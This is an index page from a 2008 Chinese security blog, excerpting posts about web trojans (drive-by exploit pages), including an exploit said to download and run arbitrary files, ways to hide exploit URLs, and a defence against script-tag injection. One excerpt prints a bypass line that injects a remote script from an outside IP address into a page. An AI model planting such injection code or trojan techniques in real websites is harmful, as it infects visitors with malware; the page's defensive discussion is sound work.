鬼仔's Blog

鬼仔注：这个漏洞。

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号"，注意不能跨域，还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马，只好拿鸡PP搓成鸡胸，这样垃圾的漏洞才能放出来~哈哈。
阅读全文 »

鬼仔注：网马中枢

Author: Greysign
2008-5-23
http://www.scanw.com/blog

余弦不久之前写了网马中枢，是关于服务端应用的一小角，他还说有其他更复杂的应用，一直等着他的BLOG更新，还是未见他写出来。最近大家都很忙。

关于网马代码，exploit固然重要，但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ，读取文件等方式来隐藏EXP的地址，不过，EXP代码完全暴露出来了，那就无法阻止代码被剽窃，被取证等行为。
阅读全文 »

作者：余弦
来源：0x37 Security

其实想想就会知道，网马的exp总会有暴露的时刻，也就是说，我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段，我们可以隐藏网马exp的地址，但是却无法保证这个exp不暴露出来，exp终究要在你的浏览器上执行恶意行为。
阅读全文 »

鬼仔注：前两天发过 <<二行代码解决全部网页木马>> 。

作者：lcx
来源：vbs小铺

原文在这：http://www.blueidea.com/tech/web/2008/5575.asp

主要目的是用css解决script标签里的http，这种方法治标不治本，我觉得防掉很难的，根治办法就是主机安全，不给别人黑掉的机会

突破方法有N种，最简单的突破办法，不把src=http放在<script>标签里。

代码：
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>

鬼仔注：跟《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》是同一作者。这篇文章是上次的增强。

作者：vickeychen
来源：经典论坛

　　还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来帮帮大家。

　　前不久《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂 阅读全文 »

刚起床，丰初就传给我的。
带测试动画

下载地址：http://www.box.net/shared/4u5vfiu8g8